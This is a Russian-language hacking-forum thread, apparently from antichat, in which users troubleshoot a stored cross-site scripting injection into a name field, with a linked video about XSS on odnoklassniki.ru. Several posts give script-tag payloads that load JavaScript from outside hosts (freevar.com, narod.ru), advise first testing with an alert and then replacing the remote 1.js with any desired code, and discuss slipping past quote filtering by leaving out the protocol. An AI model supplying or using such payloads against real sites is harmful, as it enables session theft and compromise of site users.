а про инфрейм это правильная мысль

а поподробнее можно про инфрейм, как это реализуется?

ну в общем сделал скрипт поместил его в поле имени,захожу на свой форум пытаюсь написать сообщение и пропало поле ввода...подробнее об xss на odnoklassniki.ru можно прочитать http://video.antichat.ru/file259.html
скрипт выглядит вот так <script src="www.avlo.freevar.com/1.js"></script>

в поле ваше имя вводи: <script src=http://stranica.narod.ru/1.js></script>
в 1.js напиши:
alert("XSS");
и пробуй, если алерт вылетит, то все работает, потом просто изменишь 1.js как тебе нужно и все
т.е. смысл как я понимаюв том что кавычки фильтруются, и протокол ты не указал

__________________
Карфаген должен быть разрушен...

Сделал как ты сказал,но алерт не вышел, но вот почему не знаю....вот в если в поле имени поставить <script>alert(/test/)</script> то алерт вылетает....мдяяяя дела...

В поле имени стоит <script src="www.avlo.freevar.com/1.js"></script> в 1.js написано alert(/tets/);
не срабатывает =(( когда хочешь добавить сообщение когда должен срабатывать скрипт до появляется надпись добавить сообщение и усё...ни поля,ни фига....

а протокол не умещается написать)))))

Пишет файл не найден, ты уверен что ты туда его положил?

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

хост дерьмовый, у него быввают заскоки.